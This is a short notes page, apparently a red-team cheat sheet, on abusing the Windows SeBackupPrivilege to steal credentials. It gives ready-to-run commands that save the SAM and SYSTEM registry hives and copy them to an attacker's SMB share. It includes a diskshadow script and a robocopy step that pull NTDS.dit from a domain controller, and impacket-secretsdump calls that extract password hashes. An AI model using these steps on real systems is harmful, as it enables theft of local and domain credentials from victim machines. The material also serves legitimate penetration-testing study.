Cybersec Notes

Search

SearchSearch

SeBackupPrivilege

Jun 22, 20242 min read

👾 Overview

The SeBackupPrivilege allows a user to read any files on a system, regardless of the security settings. This can be exploited to exfiltrate credentials through the SAM, SYSTEM, and NTDS.dit files.

🔍 Discovery

This requires a user with the SeBackupPrivilege enabled on a windows system.

whoami /priv

whoami

📌 Exploitation

This privilege can be used to extract the SAM/SYSTEM files easily from any machine to get access to local usernames and passwords stored as NTLM hashes.

If the machine you’re attacking is a domain controller, some extra steps can be performed to extract NTDS.dit. This is AD’s primary database file which can be used to extract domain logons.

SAM/SYSTEM

Reg.exe

This is the most straightforward way to save the files, takes 2 commands and you can grab them right from the registry.

# Saving the files
reg save hklm\sam .\sam.save
reg save hklm\system .\system.save
 
# Exfiltrating the files using SMB server
cp .\*.save \\[IP]\[share]\

NTDS.dit

Diskshadow + Robocopy

This should work on Windows Server 2008+

Create the following script on the victim machine to be used with diskshadow, it creates a shadow copy of the disk and exposes it for us to copy from:

set verbose on  
set metadata C:\Windows\Temp\meta.cab  
set context clientaccessible  
set context persistent  
begin backup  
add volume C: alias cdrive  
create  
expose %cdrive% E:  
end backup

Execute the following:

# Create a copy of the drive
diskshadow /s sebackupscript.txt
 
# Copy the ntds file
robocopy /b E:\Windows\ntds\ntds.dit C:\Temp\ntds.dit

If you're having trouble with diskshadow running, check the line endings on the file you created and ensure they're in windows format. Additionally ensure that the E: drive label isn't taken, change that if need be.

✨ Post-Exploitation

After exfiltrating your files, you’ll want to use a tool to extract the actual secrets from them.

Impacket-Secretsdump

# Local - just SAM/SYSTEM
impacket-secretsdump -sam sam.save -system system.save LOCAL
 
# Domain - needs all 3
impacket-secretsdump -sam sam.save -system system.save -ntds ntds.dit LOCAL

📝 Resources

🔗 Hyperlinkℹ️ Info
MS DocsMicrosoft’s information on filesystem privileges
Hacking ArticlesExploiting SeBackupPrivilege
Red Team NotesVarious ways to dump NTDS.dit

Graph View

Backlinks

  • No backlinks found